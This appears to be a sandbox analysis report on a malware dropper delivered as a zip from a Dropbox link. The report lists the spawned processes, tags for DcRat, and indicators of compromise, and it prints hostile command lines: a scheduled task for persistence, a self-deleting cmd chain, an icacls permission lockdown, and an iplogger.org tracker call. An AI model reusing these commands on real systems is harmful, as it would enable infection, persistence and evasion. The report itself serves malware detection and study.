Install.exem7tpR8y__P6zIjNc638scLmV.exeVQbpujdSGomqnbS9WjiyreEK.exeuV50xbiY4LlMWsebJOoi_R_O.exe_TiaXZiUu6XgZbvoAZY2sRH0.exe5dql7piSRHDDYa_r8buffZkT.exe7c54za4xnx_ox5Ogv39y8LB9.exer66VAUj92jmJRCibPDw4l9Kb.exeDj7oV6pePcIXJQ2f96mvaT24.exeKJN4UTMVm4u4hm7saACgHkd5.exe6nu8WAAz96Ll697FGgrU_0Ep.exeSN8pRGmvfIetO31nMREgZCBd.exe0JE7G3LK557H5E8.exeKJN4UTMVm4u4hm7saACgHkd5.exeVQbpujdSGomqnbS9WjiyreEK.exe368C0412AGB029I.exeybRTF_ZrBzghRmdqS2tL_QaU.exeAppLaunch.exeRegAsm.exeAppLaunch.exe5PzEorzxArsuyso_tUF64BQZ.exeXqFLMvUeBEg_P943krgYtWkU.exe36tK0gCUVT2orDhALS0_tIKC.exe2Se_pjJglnDpbeqjf2ldznTA.exektN6_OKyWBLIic4tRrS6Y7lW.exeYisnVpUhrZ2PWS7ZEq2F4LK4.exeI8dJ1qS1rcI5yzla9SoRu01p.exenvNlamGS3lVvMXNb9dzkJmr7.exeqOxMIfZDfCKOLU4NJPxsAIR6.exe36tK0gCUVT2orDhALS0_tIKC.tmpInstall.exeInstall.exeVQbpujdSGomqnbS9WjiyreEK.exeVQbpujdSGomqnbS9WjiyreEK.exeAdblock.execrashpad_handler.exebuild2.exeAdblockInstaller.exebuild3.exeAdblockInstaller.tmpDnsService.exeDnsService.exebuild2.execmd.exexsv.exeRespect.exe.pifRespect.exe.pifpid process 5276 Install.exe 5716 m7tpR8y__P6zIjNc638scLmV.exe 5788 VQbpujdSGomqnbS9WjiyreEK.exe 5752 uV50xbiY4LlMWsebJOoi_R_O.exe 5764 _TiaXZiUu6XgZbvoAZY2sRH0.exe 5728 5dql7piSRHDDYa_r8buffZkT.exe 5776 7c54za4xnx_ox5Ogv39y8LB9.exe 5812 r66VAUj92jmJRCibPDw4l9Kb.exe 6012 Dj7oV6pePcIXJQ2f96mvaT24.exe 5992 KJN4UTMVm4u4hm7saACgHkd5.exe 6072 6nu8WAAz96Ll697FGgrU_0Ep.exe 5736 SN8pRGmvfIetO31nMREgZCBd.exe 73612 0JE7G3LK557H5E8.exe 45648 KJN4UTMVm4u4hm7saACgHkd5.exe 2140 VQbpujdSGomqnbS9WjiyreEK.exe 2760 368C0412AGB029I.exe 2760 368C0412AGB029I.exe 59600 ybRTF_ZrBzghRmdqS2tL_QaU.exe 4504 AppLaunch.exe 59796 RegAsm.exe 59760 AppLaunch.exe 51472 5PzEorzxArsuyso_tUF64BQZ.exe 51484 XqFLMvUeBEg_P943krgYtWkU.exe 51492 36tK0gCUVT2orDhALS0_tIKC.exe 51508 2Se_pjJglnDpbeqjf2ldznTA.exe 51516 ktN6_OKyWBLIic4tRrS6Y7lW.exe 51524 YisnVpUhrZ2PWS7ZEq2F4LK4.exe 51532 I8dJ1qS1rcI5yzla9SoRu01p.exe 51464 nvNlamGS3lVvMXNb9dzkJmr7.exe 51540 qOxMIfZDfCKOLU4NJPxsAIR6.exe 53464 36tK0gCUVT2orDhALS0_tIKC.tmp 9452 Install.exe 70660 Install.exe 70700 VQbpujdSGomqnbS9WjiyreEK.exe 71616 VQbpujdSGomqnbS9WjiyreEK.exe 71628 Adblock.exe 5528 crashpad_handler.exe 71628 Adblock.exe 71628 Adblock.exe 5132 build2.exe 5440 AdblockInstaller.exe 6184 build3.exe 6200 AdblockInstaller.tmp 71628 Adblock.exe 71628 Adblock.exe 10468 DnsService.exe 10508 DnsService.exe 10572 build2.exe 16964 cmd.exe 19680 xsv.exe 20368 Respect.exe.pif 12316 Respect.exe.pif -
Suspicious use of UnmapMainImage 1 IoCs
Processes:
pid process 2220 -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
cmd.exemsedge.exedescription pid process target process PID 1928 wrote to memory of 4880 1928 cmd.exe msedge.exe PID 1928 wrote to memory of 4880 1928 cmd.exe msedge.exe PID 4880 wrote to memory of 480 4880 msedge.exe msedge.exe PID 4880 wrote to memory of 480 4880 msedge.exe msedge.exe PID 4880 wrote to memory of 1988 4880 msedge.exe msedge.exe PID 4880 wrote to memory of 1988 4880 msedge.exe msedge.exe PID 4880 wrote to memory of 1988 4880 msedge.exe msedge.exe PID 4880 wrote to memory of 1988 4880 msedge.exe msedge.exe PID 4880 wrote to memory of 1988 4880 msedge.exe msedge.exe PID 4880 wrote to memory of 1988 4880 msedge.exe msedge.exe PID 4880 wrote to memory of 1988 4880 msedge.exe msedge.exe PID 4880 wrote to memory of 1988 4880 msedge.exe msedge.exe PID 4880 wrote to memory of 1988 4880 msedge.exe msedge.exe PID 4880 wrote to memory of 1988 4880 msedge.exe msedge.exe PID 4880 wrote to memory of 1988 4880 msedge.exe msedge.exe PID 4880 wrote to memory of 1988 4880 msedge.exe msedge.exe PID 4880 wrote to memory of 1988 4880 msedge.exe msedge.exe PID 4880 wrote to memory of 1988 4880 msedge.exe msedge.exe PID 4880 wrote to memory of 1988 4880 msedge.exe msedge.exe PID 4880 wrote to memory of 1988 4880 msedge.exe msedge.exe PID 4880 wrote to memory of 1988 4880 msedge.exe msedge.exe PID 4880 wrote to memory of 1988 4880 msedge.exe msedge.exe PID 4880 wrote to memory of 1988 4880 msedge.exe msedge.exe PID 4880 wrote to memory of 1988 4880 msedge.exe msedge.exe PID 4880 wrote to memory of 1988 4880 msedge.exe msedge.exe PID 4880 wrote to memory of 1988 4880 msedge.exe msedge.exe PID 4880 wrote to memory of 1988 4880 msedge.exe msedge.exe PID 4880 wrote to memory of 1988 4880 msedge.exe msedge.exe PID 4880 wrote to memory of 1988 4880 msedge.exe msedge.exe PID 4880 wrote to memory of 1988 4880 msedge.exe msedge.exe PID 4880 wrote to memory of 1988 4880 msedge.exe msedge.exe PID 4880 wrote to memory of 1988 4880 msedge.exe msedge.exe PID 4880 wrote to memory of 1988 4880 msedge.exe msedge.exe PID 4880 wrote to memory of 1988 4880 msedge.exe msedge.exe PID 4880 wrote to memory of 1988 4880 msedge.exe msedge.exe PID 4880 wrote to memory of 1988 4880 msedge.exe msedge.exe PID 4880 wrote to memory of 1988 4880 msedge.exe msedge.exe PID 4880 wrote to memory of 1988 4880 msedge.exe msedge.exe PID 4880 wrote to memory of 1988 4880 msedge.exe msedge.exe PID 4880 wrote to memory of 1988 4880 msedge.exe msedge.exe PID 4880 wrote to memory of 1988 4880 msedge.exe msedge.exe PID 4880 wrote to memory of 1988 4880 msedge.exe msedge.exe PID 4880 wrote to memory of 1988 4880 msedge.exe msedge.exe PID 4880 wrote to memory of 1988 4880 msedge.exe msedge.exe PID 4880 wrote to memory of 4980 4880 msedge.exe msedge.exe PID 4880 wrote to memory of 4980 4880 msedge.exe msedge.exe PID 4880 wrote to memory of 2876 4880 msedge.exe msedge.exe PID 4880 wrote to memory of 2876 4880 msedge.exe msedge.exe PID 4880 wrote to memory of 2876 4880 msedge.exe msedge.exe PID 4880 wrote to memory of 2876 4880 msedge.exe msedge.exe PID 4880 wrote to memory of 2876 4880 msedge.exe msedge.exe PID 4880 wrote to memory of 2876 4880 msedge.exe msedge.exe PID 4880 wrote to memory of 2876 4880 msedge.exe msedge.exe PID 4880 wrote to memory of 2876 4880 msedge.exe msedge.exe PID 4880 wrote to memory of 2876 4880 msedge.exe msedge.exe PID 4880 wrote to memory of 2876 4880 msedge.exe msedge.exe PID 4880 wrote to memory of 2876 4880 msedge.exe msedge.exe PID 4880 wrote to memory of 2876 4880 msedge.exe msedge.exe PID 4880 wrote to memory of 2876 4880 msedge.exe msedge.exe PID 4880 wrote to memory of 2876 4880 msedge.exe msedge.exe PID 4880 wrote to memory of 2876 4880 msedge.exe msedge.exe PID 4880 wrote to memory of 2876 4880 msedge.exe msedge.exe PID 4880 wrote to memory of 2876 4880 msedge.exe msedge.exe PID 4880 wrote to memory of 2876 4880 msedge.exe msedge.exe -
outlook_office_path 1 IoCs
Processes:
explorer.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 explorer.exe -
outlook_win_path 1 IoCs
Processes:
explorer.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 explorer.exe
Processes
-
C:\Windows\system32\cmd.execmd /c start microsoft-edge:https://www.dropbox.com/s/v74d5j0q01fe6uk/File.zip?dl=01⤵
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument microsoft-edge:https://www.dropbox.com/s/v74d5j0q01fe6uk/File.zip?dl=02⤵
- DcRat
- Adds Run key to start application
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xdc,0x104,0x7ffcc58746f8,0x7ffcc5874708,0x7ffcc58747183⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2088,14939450888349593330,4144735002298982094,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2140 /prefetch:23⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2088,14939450888349593330,4144735002298982094,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2204 /prefetch:33⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2088,14939450888349593330,4144735002298982094,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2708 /prefetch:83⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,14939450888349593330,4144735002298982094,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3936 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,14939450888349593330,4144735002298982094,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3972 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2088,14939450888349593330,4144735002298982094,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4368 /prefetch:83⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,14939450888349593330,4144735002298982094,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5392 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,14939450888349593330,4144735002298982094,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5656 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2088,14939450888349593330,4144735002298982094,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=6108 /prefetch:83⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2088,14939450888349593330,4144735002298982094,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6508 /prefetch:83⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --configure-user-settings --verbose-logging --system-level --msedge --force-configure-user-settings3⤵
- Drops file in Program Files directory
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x220,0x224,0x228,0x1fc,0x22c,0x7ff7dc445460,0x7ff7dc445470,0x7ff7dc4454804⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2088,14939450888349593330,4144735002298982094,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6508 /prefetch:83⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,14939450888349593330,4144735002298982094,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5544 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2088,14939450888349593330,4144735002298982094,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5756 /prefetch:83⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,14939450888349593330,4144735002298982094,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5744 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2088,14939450888349593330,4144735002298982094,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5748 /prefetch:83⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,14939450888349593330,4144735002298982094,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6712 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,14939450888349593330,4144735002298982094,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6628 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2088,14939450888349593330,4144735002298982094,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=3252 /prefetch:23⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2088,14939450888349593330,4144735002298982094,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2900 /prefetch:83⤵
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵
-
C:\Users\Admin\AppData\Local\Temp\Temp1_File.zip\Install.exe"C:\Users\Admin\AppData\Local\Temp\Temp1_File.zip\Install.exe"1⤵
- Drops file in System32 directory
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Pictures\Minor Policy\r66VAUj92jmJRCibPDw4l9Kb.exe"C:\Users\Admin\Pictures\Minor Policy\r66VAUj92jmJRCibPDw4l9Kb.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Pictures\Minor Policy\75huro8A6uIQ4Z3yLnBxmNPI.exe"C:\Users\Admin\Pictures\Minor Policy\75huro8A6uIQ4Z3yLnBxmNPI.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe"3⤵
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Pictures\Minor Policy\VQbpujdSGomqnbS9WjiyreEK.exe"C:\Users\Admin\Pictures\Minor Policy\VQbpujdSGomqnbS9WjiyreEK.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Pictures\Minor Policy\VQbpujdSGomqnbS9WjiyreEK.exe"C:\Users\Admin\Pictures\Minor Policy\VQbpujdSGomqnbS9WjiyreEK.exe"3⤵
- DcRat
- Executes dropped EXE
- Checks computer location settings
- Adds Run key to start application
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Users\Admin\AppData\Local\fc9a62cb-7d5f-48e5-9c75-c63867ff4d84" /deny *S-1-1-0:(OI)(CI)(DE,DC)4⤵
- Modifies file permissions
-
C:\Users\Admin\Pictures\Minor Policy\VQbpujdSGomqnbS9WjiyreEK.exe"C:\Users\Admin\Pictures\Minor Policy\VQbpujdSGomqnbS9WjiyreEK.exe" --Admin IsNotAutoStart IsNotTask4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Pictures\Minor Policy\VQbpujdSGomqnbS9WjiyreEK.exe"C:\Users\Admin\Pictures\Minor Policy\VQbpujdSGomqnbS9WjiyreEK.exe" --Admin IsNotAutoStart IsNotTask5⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\bffb4f07-4c3f-4e92-abbe-a14842109c04\build2.exe"C:\Users\Admin\AppData\Local\bffb4f07-4c3f-4e92-abbe-a14842109c04\build2.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\bffb4f07-4c3f-4e92-abbe-a14842109c04\build2.exe"C:\Users\Admin\AppData\Local\bffb4f07-4c3f-4e92-abbe-a14842109c04\build2.exe"7⤵
- Executes dropped EXE
- Checks computer location settings
- Loads dropped DLL
- Checks processor information in registry
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" ȸo/c taskkill /im build2.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\bffb4f07-4c3f-4e92-abbe-a14842109c04\build2.exe" & del C:\PrograData\*.dll & exit8⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im build2.exe /f9⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\timeout.exetimeout /t 69⤵
- Delays execution with timeout.exe
-
C:\Users\Admin\AppData\Local\bffb4f07-4c3f-4e92-abbe-a14842109c04\build3.exe"C:\Users\Admin\AppData\Local\bffb4f07-4c3f-4e92-abbe-a14842109c04\build3.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\schtasks.exe/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"7⤵
- DcRat
- Creates scheduled task(s)
-
C:\Users\Admin\Pictures\Minor Policy\7c54za4xnx_ox5Ogv39y8LB9.exe"C:\Users\Admin\Pictures\Minor Policy\7c54za4xnx_ox5Ogv39y8LB9.exe"2⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\regsvr32.exe"C:\Windows\System32\regsvr32.exe" /U /s .\eTcHXU.OjD3⤵
- Loads dropped DLL
-
C:\Users\Admin\Pictures\Minor Policy\_TiaXZiUu6XgZbvoAZY2sRH0.exe"C:\Users\Admin\Pictures\Minor Policy\_TiaXZiUu6XgZbvoAZY2sRH0.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 5764 -s 4763⤵
- Program crash
-
C:\Users\Admin\Pictures\Minor Policy\uV50xbiY4LlMWsebJOoi_R_O.exe"C:\Users\Admin\Pictures\Minor Policy\uV50xbiY4LlMWsebJOoi_R_O.exe"2⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Pictures\Minor Policy\SN8pRGmvfIetO31nMREgZCBd.exe"C:\Users\Admin\Pictures\Minor Policy\SN8pRGmvfIetO31nMREgZCBd.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\Pictures\Minor Policy\SN8pRGmvfIetO31nMREgZCBd.exe"C:\Users\Admin\Pictures\Minor Policy\SN8pRGmvfIetO31nMREgZCBd.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\4CBGCHM82DE58EB.exe"C:\Users\Admin\AppData\Local\Temp\4CBGCHM82DE58EB.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\4CBGCHM82DE58EB.exe"C:\Users\Admin\AppData\Local\Temp\4CBGCHM82DE58EB.exe"5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\K94I82H7GA442K5.exe"C:\Users\Admin\AppData\Local\Temp\K94I82H7GA442K5.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\K94I82H7GA442K5.exe"C:\Users\Admin\AppData\Local\Temp\K94I82H7GA442K5.exe"5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C start C:\Windows\Temp\xsv.exe6⤵
-
C:\Windows\Temp\xsv.exeC:\Windows\Temp\xsv.exe7⤵
- DcRat
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\0JE7G3LK557H5E8.exe"C:\Users\Admin\AppData\Local\Temp\0JE7G3LK557H5E8.exe"4⤵
- Executes dropped EXE
- Checks computer location settings
- Modifies registry class
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\control.exe"C:\Windows\System32\control.exe" "C:\Users\Admin\AppData\Local\Temp\0QEt.CpL",5⤵
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\0QEt.CpL",6⤵
- Loads dropped DLL
-
C:\Windows\system32\RunDll32.exeC:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\0QEt.CpL",7⤵
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 "C:\Users\Admin\AppData\Local\Temp\0QEt.CpL",8⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\368C0412AGB029I.exehttps://iplogger.org/1DLDa74⤵
- Executes dropped EXE
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Pictures\Minor Policy\5dql7piSRHDDYa_r8buffZkT.exe"C:\Users\Admin\Pictures\Minor Policy\5dql7piSRHDDYa_r8buffZkT.exe"2⤵
- Executes dropped EXE
- Checks computer location settings
- Drops file in Program Files directory
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Documents\ybRTF_ZrBzghRmdqS2tL_QaU.exe"C:\Users\Admin\Documents\ybRTF_ZrBzghRmdqS2tL_QaU.exe"3⤵
- Modifies Windows Defender Real-time Protection settings
- Executes dropped EXE
- Checks computer location settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Pictures\Adobe Films\aICl8GfONwp8nKT_VlnQ1Edr.exe"C:\Users\Admin\Pictures\Adobe Films\aICl8GfONwp8nKT_VlnQ1Edr.exe"4⤵
- Executes dropped EXE
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell "" "Get-WmiObject Win32_PortConnector"5⤵
-
C:\Users\Admin\Pictures\Adobe Films\IqRZ5EVEdrzfFjHTHidxBAdw.exe"C:\Users\Admin\Pictures\Adobe Films\IqRZ5EVEdrzfFjHTHidxBAdw.exe"4⤵
- Executes dropped EXE
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell "" "Get-WmiObject Win32_PortConnector"5⤵
-
C:\Users\Admin\Pictures\Adobe Films\qOxMIfZDfCKOLU4NJPxsAIR6.exe"C:\Users\Admin\Pictures\Adobe Films\qOxMIfZDfCKOLU4NJPxsAIR6.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
